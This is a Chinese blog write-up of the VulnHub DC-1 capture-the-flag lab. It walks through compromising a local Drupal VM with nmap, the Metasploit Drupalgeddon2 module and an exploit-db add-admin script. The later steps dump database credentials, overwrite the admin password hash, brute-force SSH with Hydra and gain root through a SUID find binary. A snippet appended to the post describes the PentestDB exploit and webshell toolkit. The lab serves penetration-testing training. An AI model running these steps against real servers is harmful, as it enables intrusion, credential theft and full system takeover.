【DC—1渗透实战】


环境准备

靶场下载地址:https://www.vulnhub.com/entry/dc-1,292/
使用Vmware虚拟机中NAT网络
靶机 dc-1 192.168.146.158
攻击机 parrot 192.168.146.129


提示:以下是本篇文章正文内容,下面案例可供参考

一、服务器信息搜集

Nmap(也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包)是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)
nmap -sV -p- [ip地址]——全端口扫描并且显示软件、 版本完整信息

nmap -sV -p- 192.168.146.158

在这里插入图片描述

二、网站信息搜集

1. 浏览站点

发现是Drupal的cms
在这里插入图片描述

2.漏洞搜集

msf模块

msfconsole
searchs Drupal

该处使用的url网络请求的数据。
我们来使用这个👇
在这里插入图片描述


三、漏洞利用

msf命令行里面进行payload配置👇

use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.146.158
exploit

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功上线O(∩_∩)O,拿到flag1

shell
ls
cat flag1.txt

在这里插入图片描述
在这里插入图片描述

服务器提权

使用python调用本地shell实现交互式命令行

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
补:目标cms的关键目录:/var/www/sites/default/settings.php

cd sites/default
cat settings.php

发现数据库用户名和密码和flag2
在这里插入图片描述
在这里插入图片描述

1.连接到MySQL数据库中

mysql -udbuser -pR0ck3t

在这里插入图片描述
查询数据库名,表名,进一步刺探

show databases;
use drupaldb;
show tables;
select * from users 

在这里插入图片描述
在这里插入图片描述
发现两个用户名
在这里插入图片描述

第一种方法:在数据库里建立一个管理员级别的用户

然后用”增“or”改“更换管理员的hash值
这里先使用drupal的密码生成工具自动生成密码,然后使用”改“语句修改admin的密码

exit
php scripts/password-hash.sh haha123
mysql -udbuser -pR0ck3t
use drupaldb
UPDATE users SET pass='[hash值]' WHERE name='admin';

在这里插入图片描述
在这里插入图片描述

第二种方法:利用漏洞建立一个用户

msf模块

msfconsole
searchsploit drupal
exit

在这里插入图片描述
找到add admin的漏洞👆

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.146.158 -u zj -p zj123

在这里插入图片描述
接着成功登录到后台,找到flag3😄
在这里插入图片描述
在这里插入图片描述

cat etc/passwd

发现有个flag4的用户
在这里插入图片描述

2.使用hydra破解ssh

一、hydra简介
Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。

ssh、ftp、telnet、smb爆破等
windows远程桌面连接破解、邮箱pop破解等

hydra -l flag4 -p /usr/share/wordlists/rockyou.txt.gz 192.168.146.158 ssh

在这里插入图片描述
发现密码是orange
连接ssh↓

ssh flag4@192.168.146.158

在这里插入图片描述
在这里插入图片描述

3.提权

还需要root权限
find /root 发现root目录下有个东西
需要提权
才能拿到thefinalflag

1.发现有什么东西可以以root权限执行

find / -perm -u=s -type f 2>/dev/null 

发现/usr/bin/find
在这里插入图片描述
2.linux的find提权命令
让其在根目录查找文件,并且执行bin/sh,就有root权限了

touch zj
find / -name zj -exec "/bin/sh/" \;

在这里插入图片描述
在这里插入图片描述
ok拿到thefinalflag.txt,本靶机的渗透结束!

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PentestDB 1 介绍 本项目用于提供渗透测试的辅助工具、资源文件 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统。易扩展的exploit系统,能够使用API快速编写exploit,能够批量执行exploit 子域名爆破。爆破子域名,使用域传送、DNS爆破、GoogleHacking进行子域名爆破 C段扫描。C段扫描,支持生成html格式输出文件 服务端应用识别。识别CMS类型、Web服务器、操作系统、WEB中间件等 URI敏感资源爆破。爆破WEB敏感文件,整站备份、配置备份、敏感文件等 社工密码字典生成。根据社工信息生成密码爆破字典 Google Hacking。GoogleHacking,生成URL字典 编解码等功能。支持非常丰富的编解码方式,方便做payload编码 1.2 资源文件 各种渗透测试常用的资源文件,包括各种爆破字典、exploit、webshell、攻击payload等 2 安装 从这里下载最新版本,或使用命令 git clone https://github.com/alpha1e0/pentestdb.git clone到本地 PentestDB支持Windows/Linux/MacOS,需使用python 2.6.x 或 2.7.x运行 2.1 解决lxml依赖 项目中的脚本文件依赖于lxml linux系统一般默认安装lxml,如果没有可通过以下方式安装: pip install lxml apt-get install lxml yum install lxml windows可通过以下方式安装lxml: 到这里找到对应系统的安装包,下载到本地 安装安装包,pip install package.whl 2.2 解决nmap依赖 项目中的C段扫描依赖于nmap扫描器 到这里下载nmap相应版本 在windows下需要设置环境变量,让系统能够找到nmap.exe。 3 使用 3.1 常用脚本 项目中的python脚本提供用有用的渗透辅助功能,根目录下的pen.py为脚本入口,另外script目录下也有其他一些脚本。 3.1.1 Exploit系统 pen.py的exploit子命令提供了exploit模块相关操作,exploit模块是一个轻量级的exploit框架,可以编写各种web漏洞的exploit: 搜索exploit信息 增加、删除、修改exploit信息 执行某个exploit 搜索并批量执行exploit exploit保存在项目根目录下的exploit目录下 例如: # 列举、搜索、注册、更新、删除 pen.py exploit -l pen.py exploit -q appName:joomla pen.py exploit --register exploit pen.py exploit --update cms_joomla_3_4_session_object_injection.py pen.py exploit -d "Joomla 1.5~3.4 session对象注入漏洞exploit" pen.py exploit --detail "Joomla 1.5~3.4 session对象注入漏洞exploit" # 执行exploit pen.py exploit -e cms_joomla_3_4_session_object_injection.py -u http://127.0.0.1:1234 --attack pen.py exploit -s appName:joomla -u http://127.0.0.1:1234 --verify pen.py exploit -s appName:joomla -u @url.txt 注:有关exploit模块的详细信息请参考exploit/readme.md 3.1.2 服务端应用识别 pen.py的service子命令提供了服务端应用识别的功能,能够识别服务器信息,包括: 操作系统 web服务器 web中间件 CMS等 例如: pen.py service http://xxx.com # 开启CMS识别加强模式 pen.py service http://xxx.com --cms 3.1.3 社工密码字典生成 pen.py的password子命令提供了根据社工信息生成密码字典的功能,能够设置不同关键字生成密码字典

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值